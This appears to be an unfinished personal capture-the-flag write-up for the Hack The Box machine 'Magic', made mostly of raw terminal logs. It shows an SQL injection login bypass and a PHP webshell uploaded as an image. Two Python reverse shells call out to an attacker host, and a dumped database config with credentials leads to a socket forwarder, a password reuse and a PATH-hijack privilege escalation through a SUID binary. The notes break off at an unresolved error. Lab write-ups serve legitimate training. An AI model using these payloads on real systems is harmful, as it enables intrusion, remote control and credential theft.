


webpage to upload images

login is vulnerable to sqli
' or 1=1-- -





http://10.10.10.185/images/uploads/webshell.php.jpg?0=which%20python3

http://10.10.10.185/images/uploads/webshell.php.jpg?0=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket();s.connect((%2210.10.14.16%22,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.185] 49962
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@magic:/var/www/Magic/images/uploads$ cd ../../  
cd ../../
www-data@magic:/var/www/Magic$ ls
ls
assets  db.php5  images  index.php  login.php  logout.php  upload.php
www-data@magic:/var/www/Magic$ ls -la
ls -la
total 52
drwxr-xr-x 4 www-data www-data 4096 Jul 12  2021 .
drwxr-xr-x 4 root     root     4096 Jul  6  2021 ..
-rwx---r-x 1 www-data www-data  162 Oct 18  2019 .htaccess
drwxrwxr-x 6 www-data www-data 4096 Jul  6  2021 assets
-rw-r--r-- 1 www-data www-data  881 Oct 16  2019 db.php5
drwxr-xr-x 4 www-data www-data 4096 Jul  6  2021 images
-rw-rw-r-- 1 www-data www-data 4528 Oct 22  2019 index.php
-rw-r--r-- 1 www-data www-data 5539 Oct 22  2019 login.php
-rw-r--r-- 1 www-data www-data   72 Oct 18  2019 logout.php
-rw-r--r-- 1 www-data www-data 4520 Oct 22  2019 upload.php
www-data@magic:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}
www-data@magic:/var/www/Magic$ 
www-data@magic:/var/www/Magic$ python3 - <<'PY'
import socket,threading,select
def handle(client):
    try:
        srv=socket.socket()
        srv.connect(('127.0.0.1',3306))
        while True:
            r,_,_ = select.select([client,srv],[],[])
            if client in r:
                d = client.recv(4096)
                if not d: break
                srv.sendall(d)
            if srv in r:
                d = srv.recv(4096)
                if not d: break
                client.sendall(d)
    finally:
        client.close(); srv.close()

s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('0.0.0.0', 13306))
s.listen(5)
while True:
    c,_ = s.accept()
    threading.Thread(target=handle, args=(c,)).start()
PYpython3 - <<'PY'
> import socket,threading,select
> def handle(client):
>     try:
>         srv=socket.socket()
>         srv.connect(('127.0.0.1',3306))
>         while True:
>             r,_,_ = select.select([client,srv],[],[])
>             if client in r:
>                 d = client.recv(4096)
>                 if not d: break
>                 srv.sendall(d)
>             if srv in r:
>                 d = srv.recv(4096)
>                 if not d: break
>                 client.sendall(d)
>     finally:
>         client.close(); srv.close()
> 
> s = socket.socket()
> s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
> s.bind(('0.0.0.0', 13306))
> s.listen(5)
> while True:
>     c,_ = s.accept()
>     threading.Thread(target=handle, args=(c,)).start()
> 
PY

┌──(kali㉿kali)-[~]
└─$ mysql -h 10.10.10.185 -P 13306 -u theseus -p               
Enter password: 
ERROR 2026 (HY000): TLS/SSL error: Certificate verification failure: The certificate is NOT trusted.
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ mysql --ssl-mode=DISABLED -h 10.10.10.185 -P 13306 -u theseus -p

mysql: unknown variable 'ssl-mode=DISABLED'
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ mysql --ssl=0 -h 10.10.10.185 -P 13306 -u theseus -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 10
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Magic              |
+--------------------+
2 rows in set (0.037 sec)

MySQL [(none)]> use Magic;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [Magic]> show tables;
+-----------------+
| Tables_in_Magic |
+-----------------+
| login           |
+-----------------+
1 row in set (0.038 sec)

MySQL [Magic]> select * from login;
+----+----------+----------------+
| id | username | password       |
+----+----------+----------------+
|  1 | admin    | Th3s3usW4sK1ng |
+----+----------+----------------+
1 row in set (0.039 sec)

MySQL [Magic]> 


we cannot ssh in

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444           
listening on [any] 4444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.185] 50078
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@magic:/var/www/Magic/images/uploads$ su admin
su admin
No passwd entry for user 'admin'
www-data@magic:/var/www/Magic/images/uploads$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@magic:/var/www/Magic/images/uploads$ cat /home/theseus/user.txt
cat /home/theseus/user.txt
...
theseus@magic:/var/www/Magic/images/uploads$ sudo -l
sudo -l
[sudo] password for theseus: Th3s3usW4sK1ng

Sorry, user theseus may not run sudo on magic.
theseus@magic:/var/www/Magic/images/uploads$ 
theseus@magic:/var/www/Magic/images/uploads$ find / -perm -4000 -exec ls -l {} \; 2>/dev/null
<s$ find / -perm -4000 -exec ls -l {} \; 2>/dev/null
-rwsr-xr-- 1 root dip 382696 Feb 11  2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 149080 Jan 19  2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 18448 Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 22528 Jun 28  2019 /usr/bin/arping
-rwsr-xr-x 1 root root 10312 Dec  9  2019 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 10232 Dec 18  2019 /usr/lib/xorg/Xorg.wrap
-rwsr-sr-x 1 root root 109432 Oct 30  2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 43088 Sep 16  2020 /snap/core18/2074/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /snap/core18/2074/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /snap/core18/2074/bin/su
-rwsr-xr-x 1 root root 26696 Sep 16  2020 /snap/core18/2074/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /snap/core18/2074/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /snap/core18/2074/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /snap/core18/2074/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /snap/core18/2074/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /snap/core18/2074/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 19  2021 /snap/core18/2074/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11  2020 /snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /snap/core18/2074/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43088 Aug 22  2019 /snap/core18/1668/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /snap/core18/1668/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /snap/core18/1668/bin/su
-rwsr-xr-x 1 root root 26696 Aug 22  2019 /snap/core18/1668/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /snap/core18/1668/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /snap/core18/1668/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /snap/core18/1668/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /snap/core18/1668/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /snap/core18/1668/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Oct 10  2019 /snap/core18/1668/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10  2019 /snap/core18/1668/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /snap/core18/1668/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 85064 May 27  2020 /snap/core20/1026/usr/bin/chfn
-rwsr-xr-x 1 root root 53040 May 27  2020 /snap/core20/1026/usr/bin/chsh
-rwsr-xr-x 1 root root 88464 May 27  2020 /snap/core20/1026/usr/bin/gpasswd
-rwsr-xr-x 1 root root 55528 Jul 21  2020 /snap/core20/1026/usr/bin/mount
-rwsr-xr-x 1 root root 44784 May 27  2020 /snap/core20/1026/usr/bin/newgrp
-rwsr-xr-x 1 root root 68208 May 27  2020 /snap/core20/1026/usr/bin/passwd
-rwsr-xr-x 1 root root 67816 Jul 21  2020 /snap/core20/1026/usr/bin/su
-rwsr-xr-x 1 root root 166056 Jan 19  2021 /snap/core20/1026/usr/bin/sudo
-rwsr-xr-x 1 root root 39144 Jul 21  2020 /snap/core20/1026/usr/bin/umount
-rwsr-xr-- 1 root systemd-resolve 51344 Jun 11  2020 /snap/core20/1026/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 473576 Mar  9  2021 /snap/core20/1026/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 40152 Jan 27  2020 /snap/core/11316/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/11316/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/11316/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/11316/bin/su
-rwsr-xr-x 1 root root 27608 Jan 27  2020 /snap/core/11316/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/11316/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/11316/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/11316/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/11316/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/11316/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jan 20  2021 /snap/core/11316/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11  2020 /snap/core/11316/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Jun  7  2021 /snap/core/11316/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 111080 Jun 15  2021 /snap/core/11316/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jul 23  2020 /snap/core/11316/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 Jan 27  2020 /snap/core/8689/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/8689/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/8689/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/8689/bin/su
-rwsr-xr-x 1 root root 27608 Jan 27  2020 /snap/core/8689/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/8689/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/8689/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/8689/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/8689/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/8689/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jan 31  2020 /snap/core/8689/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Nov 29  2019 /snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/8689/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Feb 12  2020 /snap/core/8689/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/8689/usr/sbin/pppd
-rwsr-xr-x 1 root root 26696 Jan  8  2020 /bin/umount
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo
-rwsr-xr-x 1 root root 43088 Jan  8  2020 /bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
theseus@magic:/var/www/Magic/images/uploads$ 






theseus@magic:/tmp$ # create the wrapper (single command, safe with quotes)
printf '%s\n' '#!/bin/sh' \
'python3 -c '\''import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.16",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'\'' ' > /tmp/cat

chmod +x /tmp/cat
# verify
ls -l /tmp/cat
cat /tmp/cat
# ensure PATH has /tmp first, then trigger vulnerable program
export PATH=/tmp:$PATH
/bin/sysinfo# create the wrapper (single command, safe with quotes)
theseus@magic:/tmp$ printf '%s\n' '#!/bin/sh' \
<;subprocess.call(["/bin/sh","-i"])'\'' ' > /tmp/cat
theseus@magic:/tmp$ 
theseus@magic:/tmp$ chmod +x /tmp/cat
theseus@magic:/tmp$ # verify
theseus@magic:/tmp$ ls -l /tmp/cat
-rwxrwxr-x 1 theseus theseus 202 Aug 18 02:50 /tmp/cat
theseus@magic:/tmp$ cat /tmp/cat




problem getting to root. possibly missing dependency with newer socat?

====================CPU Info====================
./socat: error while loading shared libraries: libssl.so.3: cannot open shared object file: No such file or directory

====================MEM Usage=====================
              total        used        free      shared  buff/cache   available
Mem:           3.8G        591M        1.8G        6.8M        1.5G        3.0G
Swap:          1.0G          0B        1.0G
theseus@magic:/tmp$ cat /tmp/cat
cat /tmp/cat
./socat: error while loading shared libraries: libssl.so.3: cannot open shared object file: No such file or directory
theseus@magic:/tmp$ ^C
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ 


will come back later.


